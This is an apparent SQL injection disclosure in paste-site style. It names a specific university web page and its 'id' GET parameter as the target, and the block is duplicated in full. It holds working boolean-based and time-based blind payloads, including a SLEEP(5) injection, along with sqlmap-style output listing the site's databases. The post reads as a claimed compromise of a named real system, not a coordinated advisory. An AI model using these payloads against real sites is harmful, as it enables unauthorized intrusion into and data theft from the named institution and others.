<------------------- header data start ------------------- >
################################################## ###########
# Application Name : Illuonis University Vulnerability
# Vulnerable Type : SQL Injection
# Author : SynFl00der ~ Siber Güvenlik Akademisi
#Target:https://www.evl.uic.edu/entry.php?id=2028"
#############################################################
< ------------------- / header data end of ------------------- >
< -- bug code start -- >
Payloadarameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=2028 AND 3599=3599
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: id=2028 AND SLEEP(5)
---
< -- / bug code end of -- >
Db:available databases [2]:
[*] evl_db
[*] information_schema
################################################## ###########
# Application Name : Illuonis University Vulnerability
# Vulnerable Type : SQL Injection
# Author : SynFl00der ~ Siber Güvenlik Akademisi
#Target:https://www.evl.uic.edu/entry.php?id=2028"
#############################################################
< ------------------- / header data end of ------------------- >
< -- bug code start -- >
Payloadarameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=2028 AND 3599=3599
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: id=2028 AND SLEEP(5)
---
< -- / bug code end of -- >
Db:available databases [2]:
[*] evl_db
[*] information_schema